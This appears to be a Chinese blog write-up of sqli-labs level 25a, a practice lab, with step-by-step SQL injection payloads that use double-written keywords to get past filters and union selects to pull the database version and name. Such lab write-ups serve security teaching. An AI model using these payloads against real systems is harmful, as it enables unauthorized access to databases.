sqllab第二十五A关通关笔记

知识点:

  • 数值型注入
  • 双写绕过
    • oorr
    • anand
  • 这里不能用错误注入(固定错误回显信息)
  • 联合注入

测试发现跟25关好像一样,就是过滤了and or # 等东西

构造payload:id=1/0

发现成功运算了,这是一个数值型的注入

构造payload:id=1/0+oorr+1=1--+

成功显示了内容,可以尝试错误注入

构造payload:id=1/0+oorr+exp(710)=1--+

发现没有任何的回显信息,说明这里不能用错误注入

老方法,使用联合注入

构造payload:id=1/0+union+select+1,2,3+--+

成功回显了输入的内容

下面开始进行数据库名和版本的获取

构造payload:id=1/0+union+select+1,version(),database()+--+

成功获取了版本信息和数据库名

同理,可以获取数据库其他内容,这里不演示了,收工

10

相关推荐
我真的是大笨蛋13 分钟前
G1 垃圾收集器深入解析
java·jvm·笔记·缓存
ホロHoro1 小时前
学习笔记:JavaScript(4)——DOM节点
javascript·笔记·学习
码畜也有梦想1 小时前
springboot响应式编程笔记
java·spring boot·笔记
没头脑的男大3 小时前
零碎的嵌入式笔记2
笔记
小龙3 小时前
图卷积神经网络(GCN)学习笔记
笔记·学习·cnn·gcn·图卷积神经网络·理论知识
淮北也生橘128 小时前
Linux的V4L2视频框架学习笔记
linux·笔记·学习·音视频·嵌入式linux
ZZHow10248 小时前
微信小程序开发笔记(01_小程序基础与配置文件)
笔记·微信小程序·小程序
凯尔萨厮10 小时前
Java学习笔记四(继承)
java·笔记·学习
ホロHoro10 小时前
学习笔记:Javascript(5)——事件监听(用户交互)
javascript·笔记·学习
黎宇幻生15 小时前
Java全栈学习笔记33
java·笔记·学习